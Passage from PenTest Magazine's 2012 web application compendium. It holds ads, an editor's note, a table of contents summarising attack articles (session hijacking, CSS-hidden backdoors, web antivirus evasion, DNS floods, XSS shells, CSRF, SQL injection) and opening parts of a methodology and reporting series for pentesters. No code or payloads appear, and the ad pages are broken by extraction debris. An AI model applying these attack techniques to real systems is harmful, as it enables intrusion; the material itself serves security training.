pentest bible 01 2012 teasers

A Network breach...Could cost your Job!

� � ��

� � ��

� � ��

� � ��

��

��

� � ��

IS Y

OUR

NETW

ORK

SECU

RE?

��

��

Global I.T. Security Training & Consulting

��

��

��

��

INFORMATION ASSURANCESERVICES

mile2 Boot Camps

www.mile2.com��

��

Available Training Formats

Other New Courses!!��

��

(ISC)2 & CISSP are service marks of the IISSCC. Inc. Security+ is a trade mark of CompTIA. ITIL is a trade mark of OGC.GSLC & GCIH are trademarks of GIAC.

11928 Sheldon Rd Tampa, FL 33626

http://www.mile2.com/

��

��

��

KNOW YOUR ENEMY

��

DE FACTO STANDARD

��

��

��

��

��

BENEFITS

��

��

��

��

��

��


http://pentestmag.com01/2012(1)

BASICWeb Application Security for Newbies part 1By Herman Stevens

Herman introduces us to the world of hacking and web application security. He shows us his own biography as a hacker and professional, as he mention: „Let’s face it: hackers like to take things apart to see how they work and find it challenging to find other, completely different uses other than their intended purpose”. What are his first conclusions, and what he recommends for newbies you will know reading this brilliant article.

Web Application Security for Newbies part 2By Herman Stevens

Herman Stevens continues his journey through Web Application Security showing newbies his personal experience. Herman Stevens shows us plain hacker reality and all steps that the newbie has to take to become a hacker.

Web Application Security for Newbies part 3By Herman Stevens

In the previous article you learned that all client-side security can be bypassed, because one does not need to use the provided client or even a browser to attack a website. Now we are going to build further on that knowledge and delve deeper in the fantastic world of application security. Once you have decided to go that path, life will never be boring again, since there is always something new to learn.

OVERALLOpen Source Web Application Security Testing ToolsBy Vinodh Velusamy

Author shows us the significance of Open Source Web Application Security Testing Tools. As he claims „When you choose and use good tools, you’ll know it. Amazingly, you’ll minimize your time and effort installing them, running your tests, reporting your results – everything from start to finish. Most importantly, with a good web vulnerability scanner you’ll be able to maximize the number of legitimate vulnerabilities discovered to help reduce the risks associated with your information systems. At the end of the day and over the long haul, this will add up to considerable business value you can’t afford to overlook”.

10

EDITOR’S NOTE

16

Hello Everyone!It has been over a year since PenTest was released. A year full of great articles especially devoted to web applications. Therefore, we have decided to put them together and prepare for you something special.

At the beginning PenTest had been released once per month and it was dedicated to the wide range of topics – including the realities of the market, interviews and social matters. Web Application was created as an answer to your needs. It was firstly released in November and now it is the most popular and appreciated issue. But do not forget about Pentest Extra, Pentest Regular and Pentest Auditing & Standards which also enjoy your interest and seek to be of the best quality and usefulness for you.

We proudly present Pentest Web App Compendium. Two hundred pages divided into several thematic categories: SQL injection, XSS & CSRF, attack, fuzzing, overall, basics and memory corruption. We know that there is a lot more issues and problems to be discussed. But it is impossible to start all threads at the same time. So we like to think about this publication more like a good beginning rather than a big crowning.

So here it comes to summarize our fruitful cooperation: Pentest Web App Compendium: the only, the unique, the best! 29 articles devoted to web applications carefully selected from all our issues to create thematically diversified mixture of technically advanced pieces able to satisfy your expectations. Now you can have them in one issue that you can obtain individually. We believe it will encourage you to stay with PenTest for longer.

We would like to say thank you to all our readers, partners, authors, betatesters and proofreaders, particularly emphasising: A. Rao, Rishi Narang, Jeff Weaver, Robert Keeler, Scott Christie, Dennis Distler, Massimo Buso, Ed Werzyn, Jonathan Ringler, Johan Snyman, Eugene Dokukin, Daniel Wood. We wouldn’t be here without your support and help.

We greatly appreciate all suggestions and pieces of advice given to us in good faith. We always consider them and try to take advantage of your experience.

Enjoy reading!Wojciech Chrapka, Malgorzata Skora

& PenTest Team

22

26


TEAMEditor: Wojciech [email protected]

Malgorzata Skóra [email protected]

Betatesters: A. Rao, Jeff Weaver, Scott Christie, Dennis Distler, Massimo Buso, Ed Werzyn, Jonathan Ringler, Ankit Prateek, Robert Keeler, Aidan Carty, Kyle Kennedy, Daniel Wood, Johan Snyman

Senior Consultant/Publisher: Paweł Marciniak

CEO: Ewa [email protected]

Art Director: Ireneusz Pogroszewski [email protected]: Ireneusz Pogroszewski

Production Director: Andrzej Kuca [email protected]

Marketing Director: Ewa [email protected]

Publisher: Software Press Sp. z o.o. SK02-682 Warszawa, ul. Bokserska 1Phone: 1 917 338 3631www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage.All trade marks presented in the magazine were used only for informative purposes.

All rights to trade marks presented in the magazine are reserved by the companies which own them.To create graphs and diagrams we used program by

Mathematical formulas created by Design Science MathType™

DISCLAIMER!The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Web services and testingBy Saurabh Malhotra

A web service is just a system which resides somewhere on a network and gives response specific requests from clients. Here you must be aware of the term clients, clients are not only the people working on their computers on the desk, and it can also be some machines.

Ready Your Firefox for PentestingBy Dhananjay D. Garg

Although even today web browsers serve the primary purpose of bringing information resources to the user, they no longer represent a software application with bare bones support for just HTML. Today, web browsers like Mozilla Firefox come with the support of add-ons, which are small installable enhancements to a browser’s foundation.

Web Application Security Vulnerabilities Have Been Prevalent The Last DecadeBy Matt Parsons

Port 80 and Port 443 has been a great attack vector for malicious attackers. This article will discuss the three most common and devastating software security vulnerabilities. SQL injection, Cross Site Scripting and Cross Site Request Forgery.

ATTACKSession HijackingBy Nikhil Srivastava

Session hijacking, also known as TCP session hijacking, allows a user to take control over a Web user session by surreptitiously obtaining the session ID and masquerading as the authorized user. Once the user’s session ID has been accessed (through session prediction), the attacker can masquerade as that user and do anything the user is authorized to do on the network.

Finding Your TargetBy Willem Mouton

Dumpster diving, if you are up for it and have physical access to the target, means sifting through trash to get useful information, but in recent times social media can provide us with even more. Sites like LinkedIn, Facebook and Twitter can provide you with lists of employees, projects that the organization is involved with and perhaps even information about third party products and suppliers that are in use.

Search Form Based DoSBy Bunyamin Demir

Many of today’s applications have prevention against attack vectors like wildcards queries. But this still does not mean that they are not exposed to Denial of Service attacks. Simple search (space, only one character, etc.) is not as effective as wildcard

CONTENTS

36

44

50

62

72

76


attacks. But even the simple search queries; increase the application server’s response time if you find a good way to the increase the amount of database results. With this in mind, the Advanced Search feature of the applications will create complex (containing more than one keyword like bank account, money, credit) queries and as a result of these complex queries the number of results will be greatly increased.

Backdoors Hiding Malicious Payloads Inside Cascading Style SheetsBy Hans-Michael Varbaek

When a website gets compromised a new file is often created by the attacker, where he or she can sometimes do almost the same on the system as any other user. On Linux the user used to help the attacker is www-data, which is by default used for serving Apache threads. So it wouldn’t be smart to block that user from the system as the Apache threads spawning from the main process (which is running as root in order to be able to bind to port 80 and / or 443) should never run as root but as an unprivileged user instead.

How to pentest well-known CMSBy Sumedt Jitpukdebodin

Today, a new website is created about every minute. Anybody can be an owner of a website today very easily. Most new websites have the same look, page structure, different colors, only difference is the logo of the website. These entire websites are created with the same CMS. The CMS (Content Management System) is a web application system that has many tools for helping the web master to author content, customization of the theme, administration website, user management, etc.

Bypassing web antivirusesBy Eugene Dokukin aka MustLive

After examining the web antiviruses: Web Virus Detection System, Google, Yahoo, Yandex, Norton Safe Web, McAfee SiteAdvisor, and StopBadware; he concluded that every web antivirus is vulnerable to malware’s attempts to hide from it. This allows malware to go undetected and continue to infect visitors of these infected websites. In this article, he will describe such methods of bypassing web antiviruses and outline what developers of these systems need to take into consideration in order to prevent the possibilities of hidden malware passing through them.

How to attack DNSBy Aleksandar Bratic

DNS is a very attractive to attack as very often IT administrators forget to implement measures to secure DNS service. DNS listens on port 53 where UDP is used to resolves domain names to IP addresses and vice versa. It can also enlist TCP on the same port for zone transfer of full name record databases. It is estimated that 20% of total Internet traffic amount is DNS traffic. As UDP is a connectionless protocol, a denial of service attack is very difficult to trace and block as they are highly spoofable. A DNS flood works by sending large number of rapid DNS requests, flooding the server with an amount of traffic that it can’t handle so that the performance of the server drops for legitimate requests.

XSS & CSRFXSS Using Shell of the futureBy Sow Ching Shiong

Shell of the Future is a Reverse Web Shell handler. It can be used to hijack sessions where JavaScript can be injected using XSS or through the browser’s address bar. It makes use of HTML5’s Cross Origin Requests and can bypass anti-session hijacking measures like Http-Only cookies and IP address-Session ID binding.It has been designed to be used as a proof of concept to demonstrate the impact of XSS vulnerability in a penetration test with the same ease as getting an alert box to pop-up.

Cross-Site Request ForgeryBy Jamie

During a test, I found a create user function which was vulnerable to CSRF. This would allow a targetted attack against the web site by sending the equivalent of phishing emails; except instead of trying to get the user to enter their credentials, they would simply have to click on a link while logged in. The payload would create a privileged account and email the password to the attacker, so could easily happen without the administrator’s knowledge.

XSS & CSRF: Practical exploitation of post-authentication vulnerabilities in web applicationsBy Marsel Nizamutdinov

The goal of this article is to demonstrate the real danger of post-authenticated vulnerabilities. We will not explain the basics of web application attacks in this article, as that has already been done many times before by others. We will focus on a practical way to exploit post-authentication XSS’s and CSRF, which remain a highly underestimated attack vector in the security scene.

78

82

86

88

94

98

104

01/2012(1)

Discovering Modern CSRF Patch FailuresBy Tyler Borland

Cross-site request forgery (CSRF/XSRF) vulnerabilities allow an attacker to perform authenticated actions without authenticating as the user. The issue revolves around general browser architecture and its handling of the web origin policy. In particular, issues stem from how it handles same origins and authority. Some of the issues can not be fixed in browsers as the real problem is how web applications handle actions. These vulnerabilities are easy to locate and perform attacks against whilst allowing an attacker to completely compromise an account and/or compromise the host.

Business Logic Vulnerabilities via CSRFBy Eugene Dokukin

There are two types of Business Logic flaws: server-side and client-side. First one allows the user of the site to manipulate the site’s functionality to increase his finances, second one allows an external attacker to manipulate the site’s functionality to increase his finances, by decreasing finances of the user of the site. And I have found both types of such vulnerabilities many times since 2005.

CSRF Attacks on Network DevicesBy Eugene Dokukin

The first attack it’s to turn on the remote access to the admin panel (it’s off by default), to allow remote attacker to access the admin panel from the Internet and change all required settings (and this attack can be conducted in one request). Network devices which have an option to allow remote access and have CSRF vulnerabilities can be attacked in such way.

SQL INJECTIONNTO SQL InvaderBy Sow Ching Shiong

NTO SQL Invader is a SQL injection exploitation tool. It gives the ability to quickly and easily exploit or demonstrate SQL injection vulnerabilities in Web applications. With a few simple clicks, a penetration tester will be able to exploit a vulnerability to view the list of records, tables and user accounts of the back-end database.

SQL Injection Pen-TestingBy Sow Ching Shiong

SQL Injection is an attack in which the attacker manipulates input parameters which directly affect

112

120

124

128

132

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

http://www.momentumpress.net/


an SQL statement. This usually occurs when no input sanitisation is conducted. Depending on permissions, an attacker may be able to read database contents or even write to the database. In this article, the author will show you how to perform SQL injection pen-testing using open source and free tools available for Windows and Linux.

SQL Injection: Inject Your Way to SuccessBy Christopher Payne

Databases are the backbone of most commercial websites on the internet today. They store the data that is delivered to website visitors (including customers, suppliers, employees, and business partners). Backend databases contain lots of juicy information that an attacker may be interested in. Here the author makes a great introduction into the art of SQL Injection.

FUZZINGFuzzing for FreeBy Mrityunjay Gautam

As a developer working on a product release, we tend to re-use most of the legacy code from the previous release and then work on the new features and bug-fixes only. As a QA resource, we would be using the same “conformance test suite” or the same “stress test suite” to ensure that the new builds are working as expected. In this article the author gives us the good insight into the theory of the art of fuzzing.

Fuzzing With SulleyBy Jose Selvi

Can you write a simple python script? Can you understand a network protocol and describe it using a simple object set? If so, you can find your own 0-day vulnerabilities! In this article we are going to describe how we can use Sulley Fuzzing Framework with a real vulnerable FTP Server. As it is mentioned above, the author presents you how to use the Sulley Tool.

Fuzzing With WebScarabBy Sagar Chandrashekar

In order to follow along with the fuzzing exercises in this article, you will need a fuzzer and fuzzing target. WebScarab will be our fuzzer and WebGoat web application is our target. WebScarab and WebGoat can be installed on both Linux and Windows machines. WebScarab is a framework maintained by OWASP. It helps security engineers, developers to identify vulnerabilities and bugs in web applications. It is written in Java, and is

thus portable to many platforms. The author focuses on describing how does the WebScarab Tool work like.

Fuzzing in a Penetration TestBy Joshua Wright

Protocol fuzzing has been a popular technique for bug discovery with a number of tools, books and papers describing the benefits and drawbacks. Although typically used for bug discovery in a lab environment, there are opportunities to use fuzzing in a penetration testing role too. Here, you will certainly get convinced by Josh, that fuzzing can be used in a wide range of ways.

MEMORY CORRUPTIONIntroduction to exploit automation with Pmcma, Part IBy Jonathan Brossard

Determining exploitability is hard, writing exploits is hard. In fact, due to theoretical limitations hopefully known to the reader of this paper (aka: halting point problem), they are two sides of the same coin. Proving unexploitability is provably unfeasible in the general case, and practically for the vast majority of computer programs actually used nowadays. So what you can get at best is a it’s not doable given the state of the art of exploitation. Public knowledge, common sense… In this article the author made a serious efforts to provide you all the details concerning Pmcma tool, released at the Black Hat US conference this year.

Introduction to exploit automation with Pmcma, Part IIBy Jonathan Brossard

This year a tool called Pmcma (Post Memory Corruption Memory Analysis) was released at the Blackhat US security conference. The following article is an introduction to Pmcma. The second part of the article describes pmcma.c implementation, focusing on attacking function pointers, simulating arbitrary reads, detecting unaligned memory accesses and finally automating analysis and exploitation scenarios. The author made a serious efforts to provide you all the details concerning this tool, that you might need.

142

150

154

158

164

172

184

http://www.myappsecurity.com/

BASIC

http://pentestmag.com01/2012 Page 11 http://pentestmag.com01/2012

I started my hacking life more than 40 years ago, by taking apart tube radios, modifying them to listen to distant stations on the short wave bands. In the

process I re-utilized our clothesline and made it into a large radio antenna to my mother’s dismay. Let’s face it: hackers like to take things apart to see how they work and find it challenging to find other, completely different uses other than their intended purpose.

This tinkering activity was soon followed by my first introduction into programming. The personal computer had not been invented yet (yes, I am that old), but Hewlett Packard and Texas Instruments introduced some fantastic programmable calculators. Schools and universities were very quick to forbid their use because they wanted students to learn how do the math other than just punch a few buttons on a calculator to get an answer.

Of course, like all forbidden fruits, this only made them even more popular. I have very fond memories of wasting whole evenings by typing in hundreds of op-codes into a TI-58, to create a completely useless program that would calculate PI to an infinite numbers of digits.

Fast forward a few years, and the wars between the ZX Spectrum and Commodore 64 computers, and later the Atari ST and the Amiga began. That started my rudimentary programming skills in Basic, on the rubbery keyboard of the ZX Spectrum, which

cascaded into a whole bunch of other programming languages on the Amiga (ARexx, Forth, Modula2, Pascal, Lattice C).

The Internet was still only available in the deeper dungeons of the academic world, but people started to use modems to connect their computers to amateur networks, such as Fido or commercial offerings like CompuServe. I became a node in the worldwide Fidonet, where people from all over the world connected to my Amiga 500 BBS (Bulletin Board System) to exchange email, news and files.

A few years later, was the birth of the commercial Internet. My humble Amiga e500 was the first non-academic and non-corporate system on the Internet in Belgium. My first act – at least one that can still be traced in Google groups – on the Internet, was to start a flame war between Module2 and C language fans. I am afraid that most young people nowadays do not really understand how long all their Internet comments will be available for everyone to see.

After the demise of Commodore, I switched to a PC and ran the BBS on Linux (the infamous Slackware distribution that took about 20 floppies to load – usually one experienced a read error on the 20th disk).

I finally made my hobby into my profession (first as developer, then as security consultant) and the rest is history. So, I believe that people are not made into hackers, but they are born that way. They like to break

Web Application Security for Newbies – Part 1

Born this way

“How did you become a hacker?” is the number one question people ask me when they learn what I do for a living. This question does not have a short, or easy answer.

BASIC

Page 10 http://pentestmag.com01/2012 http://pentestmag.com01/2012

background, and the knowledge that is needed to become a top consultant, or hacker, in this big application security space.

This series starts from the assumption that you have the right mind set and are determined to learn as much about application security as there is to learn. With that attitude, anything goes and you will succeed. I also assume that you already have some basic networking and server knowledge and that you know some scripting and are not afraid to install applications and test tools.

Your Customer Does not Really Know What They WantWorking as a professional, you should always keep in mind what the customer really wants. Your report and information are the only things that are important: that is what the customer is paying for.

Of course, your report should respond to what the customer wanted you to execute. Unfortunately, the problem is, what your customer asks you to do, might not be what they really wants you to do, or need for you to do. Let me explain that further.

A standard, such as the Payment Card Industry (PCI) standard, requires pen-testing (at network and application level) and vulnerability assessments. Unfortunately, no further definitions are given.

Leaving out source code review, there are two main types of possible assessments:

• a pen-test: the goal is to exploit a vulnerability (or multiple vulnerabilities) and gain access to an application or data (the target);

• a vulnerability assessment: the goal is to list as many vulnerabilities as possible, and provide an educated estimate of the vulnerability level, if this is considered a high, medium or low risk.

There is no generally accepted definition about what is a pen-test, or what is a vulnerability assessment and there is even more confusion on what constitutes a proper assessment or pen-test. (Note: The above definitions are mine.) Many of my customers will ask for a pen-test, but if you ask them about it, what they really want is a vulnerability assessment.

Talk to your customer, and give them the best choice based on their security objectives. If you need some arguments about what is the best type of assessment, try not to hit them with a bunch of marketing material, but give them independent and unbiased advice (customers have a long memory and will appreciate that) and refer your customer to this publication:

things, open them up, put them back together and learn as much as possible in the process, since they love new technologies and are very good in thinking out of the box.

If you believe that you have the right attitude and these qualities, you might have the hackers’ mentality, but might still not know that much about web applications, and even less about how to hack them.

You have stumbled to the right place and read the right magazine, because this is exactly what this series is about: How to hack a web application (when talking to your friends), or How to assess the security of critical web application (when talking to your customers).

Knowledge is KingWhen you start working as a consultant, you soon learn that your customers do not pay you for what you know about a specific subject, but what you know about what works and what doesn’t work. Although, (as a pen-tester or hacker) your technical skills are important, the real value is on how you translate that knowledge into something your customers will value.

If you focus only on the technical part, you will be able to tell the customer about the vulnerabilities in their application, or how you hacked your way into their network, but you will be more valuable to them if you can tell them how to prevent it next time, or what went wrong at the management level.

It is fine to know the technical faults, but if a fix would cost a million dollar and six months of additional testing, you need to have better advice to give to the customer other than, Fix this now!

I have seen too many technical pen-test reports in the past, hammering hard on what was technically wrong with an application, but not provide any advice on how to fix it, apart from technical items. Your customer wants to know:

• What is the business risk? • Is there a quick-fix available?• Are there any mitigating measures?• What can I do to prevent this from happening

again?• How much will it cost and what is the timing?

This series will, not only give a good introduction on the technical side, but will also work on the people, reporting and presentation skills. Don’t worry, this will not become a boring theoretical series – there will be plenty of technical information as well.

This series will provide you with knowledge on application security assessments, the tools, skills,

BASIC


• Based on a case study of two web-based electronic health care record systems the paper, One Technique is Not Enough: A comparison of Vulnerability Discovery Techniques (available from http://andrew-austin.com/papers/esem2011.pdf – note that their penetration test is in reality a vulnerability assessment) comes to the following conclusions:• no single technique discovered every type of

vulnerability;• static analysis found the most implementation

bugs;• systematic manual penetration testing found the

most design flaws;• the most effective technique (measured in

vulnerabilities discovered per hour) was automated penetration testing);

• if one has limited time, one should conduct automated penetration testing to discover implementation bugs and systematic manual penetration testing to discover design flaws.

Of course, if the customer needs a specific kind of assessment because of compliance requirements, they really do not have a choice.

This series will focus on an vulnerability assessments at the application level, but even as a dedicated pen-tester, you must first find a vulnerability. I will offer plenty of interesting material on how to improve your skills.

Your Competitors will Muddy the WatersYou have talked to your customer about their needs, or read their detailed Request for Proposal and wrote a brilliant quote that answered all of their requirements. Surely, you think, you will win this project!

A few weeks you anxiously call the customer for news, only to find out that they awarded the project to one of your competitors. Asking for a reason, the customer explained that your quote was twice the price of the cheapest one. Impossible! You have the best experience, the best consultants and the best methodology. What went wrong?

Unfortunately, there are many ways to execute a vulnerability assessment and your competitors were able to offer a lower price, because they have a different methodology:

• A fully automated scan, with nothing more than the automated report, takes less than day and my little sister can execute it;

• An automated scan, with a consultant deleting the false positives, takes less than a day, and a junior can do it;

• A largely manual assessment based on the deep knowledge of the consultant, will take many days and needs a senior consultant.

Guess what methodology is the cheapest and was offered by your competitors?

Note that all methodologies might have there benefits and be the best offer for the customer in certain circumstances.

However, you definitely do not want to loose a project because of one of your competitors offered the easy solution. What to do?

Make it very clear to your customer about what your propose and what the advantages are:

• Use the descriptions and tests as defined in the OWASP ASVS (Application Security Verification Standard standard – https://www.owasp.org). The ASVS defines four levels of application-level security verification for Web applications.

Each level described in ASVS includes a set of requirements for verifying the effectiveness of security controls that protect Web applications. The lowest level is the tool-based level.

• Use a standard methodology based on the OWASP Testing Guide: this is a very detailed guide, explaining step-by-step what needs to be tested in a typical web application vulnerability assessment. You might want to start reading this guide, since in the next part of the series we will use that as a background.

The guide (updated in 2008) is already a bit outdated, but remains a very solid basis for anyone starting in application security. Some requirements just cannot be assessed by a tool.

What is This Thing called OWASP and Why Should I Care? OWASP (the Open Web Application Security Project) is a not-for-profit, worldwide charitable organization focused on improving the security of application software. Its mission is to make application security visible, so that people and organizations can make informed decisions about true application security risks.

Everyone is free to participate and all materials are available under a free and open software license. OWASP has local chapters with meetings all over the world. OWASP publishes many tools and guides related to application security.

OWASP gained a lot of credibility when the Payment Card Industry (PCI) Data Security Standard (DSS) required that all applications in scope:

http://andrew-austin.com/papers/esem2011.pdf

https://www.owasp.org/

BASIC

Page 12 http://pentestmag.com01/2012 http://pentestmag.com01/2012

• Must comply with the secure coding guidelines of OWASP;

• Must protect against the OWASP top-10 of vulnerabilities or similar.

The U.S. Federal Trade Commission strongly recommends that all companies use the OWASP Top Ten and ensure that their partners do the same. In addition, the U.S. Defense Information Systems Agency has listed the OWASP Top Ten as key best practices that should be used as part of the Department of Defense Information Technology Security Certification and Accreditation Process.

It is always easier to link your methodology to an established standard such as OWASP. If you have invented your own completely different methodology, you will lose an awful lot of time explaining the benefits of your approach to your potential customers.

The ReportA report is written at the end of an assignment. So, why is it in this first article of this series? Quite simple: the report is the one thing that your customers is paying you for. It is based on the expectations by the customer of the project and should not be taken lightly.

Everything you will validate during the security tests will be done because it is needed in the final report. If the customer does not care about a specific security related risk, do not lose too much time performing tests to proof that they are vulnerable. An example:

• A multinational company offered an on-line job database, where candidates could leave their resume, and employers could search for good candidates. They really wanted to have a high level of confidentiality, but could accept a downtime of multiple days if confidentiality was in danger. In this case, test for confidentiality issues, such as:

• Can the current employer detect if the one of his staff members is posting a resume?

• Can employers see what type of profiles the competitors are looking for, or what candidates they are approaching?

• Can confidential data be extracted by third-parties who should not have access to it?

• A company responsible for air traffic control has extremely high availability demands, but could not care if data was leaked to the outside world (the information is mainly public).

Ask the question: What keeps you awake at night? This is the number one item your tests should be investigating and focusing on. This is closely related to a risk rating (I prefer to give it the name of priority rating, since the term risk rating might have a different meaning depending on the type of the company or the risk-appetite of that same company).

Refer to Table 1, for an example. Note that this table must be modified for each assignment. Issues with a high priority rating should be tackled first.

Do not use an overly complex classification. This is very often used by companies to give the impression that their measurements are very exact and are based on solid research. Usually they are not, and you definitely do not want to be involved in discussions like, This issue is rated 63.4. Do we need to implement the fix immediately, or can we wait six months, as with this 60.1 rated issue? The report should also include:

• A management summary detailing the business risks and recommendations and it should not contain any technical details and jargon, but should explain exactly what harm an adversary can do.

• A technical section providing an overview of all issues, classified according to the priority rating.

Table 1. Example priority rating for detected issues

Priority RatingCritical Issues leading to an attacker

gaining administrative rights on the application orgaining access to other parts of the back-end infrastructure

High Issues enablingan authentication or authorization bypassa denial-of-service (DOS) attackor a compliance issue.

Medium Con�dentiality related issues or issues that weaken the security posture of the application

Low Issues with very low impact, generally deviations of best practices without immediate impact.

Informational Anything else detected that should be in the report, but is not a security issue.

BASIC

http://pentestmag.com01/2012

Be critical, but be correct: People’s jobs may be at risk because what you write.

For the management section, provide details on countermeasures, but remember: this is not only the fix at the application level, but maybe mitigating issues. An example: If the application has a weakness in the authentication system that allows an attacker to perform a brute-forcing attack, this might take a long time to fix. A temporary and mitigating measure might be to monitor the application to see if any brute-force efforts are happening or not.

Table 2, provides an overview of items usually present in a management summary or a technical section of a vulnerability assessment report.

For each discovered item, include the following information: the description, the possible impact, a proof of concept and the remediation steps.

Keep your text short and to the point, and – where necessary – provide references to OWASP material (http://www.owasp.org), the Common Attack Pattern Enumeration and Classification (CAPEC – http://capec.mitre.org/) and the Common Weakness Enumeration (CWE – http://cwe.mitre.org) in order to have a common language to discuss each item.

The above recommendations should enable you to produce better reports than a report from a tool, and focus on things that are interesting (and thus worth money) for your customer.

ConclusionThis was the first in our series. After reading this article, you should:

• Know the difference between a penetration test and a vulnerability assessment;

• Understand the goals of your customer and give him some unbiased advice;

• Be very clear in what you offer;• Advise your customer on business risks and

countermeasures;

• Know a bit or two about the OWASP Testing Guide and the OWASP ASVS standard;

• Know the contents of a quality report.

I hoped you like this article, next time we start with a technical overview of the HTTP protocol and the HTML standard, some often used tools and the first vulnerabilities for our report.

In Information Technology, everything becomes a commodity. Do not become the next one. Make certain that you can do more than just pushing a button to start a tool. Read all about it next time! u

Table 2. Typical content of a report

Web Application Vulnerability ReportManagement Summary high level description of the scope and goal

overview of critical and high priority rated items, described without any technical jargonrecommended countermeasures: quick �xes, temporary �x, complex change, new application. Include an estimate (high, medium, low) of the costs and a recommended timing. Recommended process improvement to prevent the issue from happening again for audit, security, development and IT management

Technical Section detailed overview of scope and goaldescription of scoring methodoverview of tests executeddetailed overview of each discovered issue

HERMAN STEVENSAfter a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant) Herman Stevens, now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specializes in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman by email ([email protected]) or visit his blog (http://blog.astyran.sg).

http://pentestmag.com

http://www.owasp.org

http://capec.mitre.org/

http://capec.mitre.org/

http://cwe.mitre.org/

http://www.astyran.com

mailto:[email protected]


http://blog.astyran.sg

http://workbooks.com

BASIC


Movies usually paint the same image of hackers: self-trained loners, no respect for rules and authority, nerds and wizards at the keyboard,

capable of thinking out-of-the-box, living an exciting life...

While I believe I do live an exciting life (after all, my skills has brought me to all corners of this planet), not all of the above hacker capabilities are being sought after and in reality the image of the lone hacker is as far from the truth as can be imagined.

As a future hacker, you:

• Will be working in teams: No single individual possesses all the knowledge required, or are even capable of attaining all that knowledge. Most hackers I know really are self-trained, they love to tinker and delve deep into the technical details, but in the real world, you will have limited time for a project, and asking a colleague is usually way faster then delving into obscure manuals.

• Will respect you colleagues and learn from them: I learned the most about application security by doing peer reviews of their reports. It really opens your mind to see what vulnerabilities others can find, how they describe the risks involved and potential ways to exploit those vulnerabilities. You must be capable to suck in that knowledge like a sponge, and if you are really good, soon your

colleagues will learn from you also and respect you as a team member.

• Follow a strict methodology: You definitely do not want to present an ‘all clear’ picture to management, while a staff member who ran a simple public domain tool just found a critical vulnerability. I still consider every assignment as fun, exciting and even exhilarating at times, but part of the job is very boring. You need to develop or – when you start your life as a hacker – follow a strict methodology in order not to miss something important. Only experience will teach you when you can cut corners safely, no five-day ethical hacking course will make a skilled consultant out of you.

• Learn when to suppress your nerdy nature: Of course you must hone your technical skills, but in the end, you must be able to explain them in clear, non-technical terms to top management, IT auditors and security managers, so they understand the good and the bad things about the solution. Remember, you are working for a customer, that has a specific goal or objective in mind. They hired you as professional to verify whether or not their new baby is secure (and this really means secure enough in the eyes of a businessman) and can attain the security objectives in line with the expectations of management.


The naked hacker

None of the movies about hacking depict the real truth about it. But, they are good at one thing – they attract people with potential talent into the ‘hacking’ profession.

BASIC

Page 22 http://pentestmag.com01/2012 Page 23 http://pentestmag.com01/2012

Today we are going to build further on that knowledge and delve deeper in the fantastic world of application security. Once you have

decided to go that path, life will never be boring again, since there is always something new to learn.

Contrary to network level security, applications are never the same. They might have the same business functionality, but the design and implementation always differ wildly. No two applications are the same, which makes application security pentesting both fun and challenging.

Customers often want to know how we can possible keep up with the changing technology landscape or the thousands of different frameworks. The secret is that once you know the basics, the principles of secure programming, it becomes easy. You just have to apply those principles to the new technology, and, good for us, whenever new things arrive (for instance mobile apps) the same old mistakes will be made by the new batch of eager developers wanting to jump on the new bandwagon.

Last month you learned that all client-side security can be bypassed, because one does not need to use the provided client or even a browser to attack a website. This is also true when you need to review an Android or iPhone app; never forget the server-side part!

We also touched up the need for a strict methodology, and this is where we start today.

Information GatheringA good start to build your own methodology is to read the OWASP Testing Guide (https://www.owasp.org/index.php/Category:OWASP_Testing_Project). A new version of the guide is alas long overdue, but the basics are still correct.

Let’s take a look at how the information gathering phase can be executed. Information gathering is important. You will want to have the answers to the following questions:

• What technology is used by the web application and, are the versions of these services, frameworks and technologies used vulnerable to known attacks?

• What is the attack surface of the application? There are different definitions available of the attack surface, but in general these all vectors that can be used for an attack, such as:• Does the application accept file-uploads?• Is there an email (e.g. leave feedback) option?• What input forms are available?

• Who are the users of the site? Information can be important to abuse later to brute-force the authentication system.

The OWASP Testing Guide lists the following activities in the Information Gathering Phase:


I know what you developed last summer

In the previous article you learned that all client-side security can be bypassed, because one does not need to use the provided client or even a browser to attack a website. Now we are going to build further on that knowledge and delve deeper in the fantastic world of application security. Once you have decided to go that path, life will never be boring again, since there is always something new to learn.

https://www.owasp.org/index.php/Category:OWASP_Testing_Project

https://www.owasp.org/index.php/Category:OWASP_Testing_Project

OVERALL


In fact more than four out of every five businesses have experienced a data breach still not all business website owners are aware of website security

threats or how vulnerable their website is without the necessary protection. And this is where free web application security testing tools comes in.

It goes without saying, websites are vulnerable to online security threat and if a website’s server and applications are not protected from security vulnerabilities, identities, credit card information, all billions of dollars are at risk. Quite ideally therefore cost effective security measures needs to be taken, which might entail moving away from proprietary client/server applications to web applications which are not only cheap but at the same time provides an extensive delivery platform.

In fact, impact of an attack on websites can actually cause costly and embarrassing disruptions in a company’s services. And without employing the web security testing tools business can incur loss. Attackers are lurking everywhere and they are well aware in fact aware of the Web application vulnerabilities. Also, their attempts to get at it are thoroughly assisted by several important factors. It is the right time to protect your website with website security audit and with thorough website security test. A web security testing service will in fact make sure that the company is fully compliant with rules and regulations, and is able to respond quickly to any attacks.

There are some powerful and free web application security testing tools which can help you to identify any possible holes. In this article we will explore the choice of tools available.

Introduction One of the prominent Information Security consultant and researcher, Shay Chen has conducted some extensive testing using these tools and has published a benchmarking report in http://sectooladdict.blogspot.com/2011/08/commercial-web-application-scanner.html using the project WAVSEP.

Shay Chen’s Project WAVSEP consists of an evaluation platform which aids in the comparison of 60 Commercial & Open Source Black Box Web Application Vulnerability Scanners. This evaluation platform contains a collection of unique vulnerable web pages that can be used to test the various properties of web application scanners. This research is only valid for estimating the detection accuracy of SQLi & RXSS exposures, and for counting and comparing the various features of the tested tools. Shay Chen did not evaluate every possible feature of each product, only the categories tested within the research.

The assessment criterion of detecting the accuracy of SQL Injection is one of the most famous exposures and the most commonly implemented attack vector in web application scanners. This because a scanner that

Open Source Web Application Security Testing Tools

Needless to say that with cybercrime is on the rise and with the immense rise in online security threats no business owner should overlook their website’s security and this is exactly where the concept of web application security testing tools have gained immense significance.

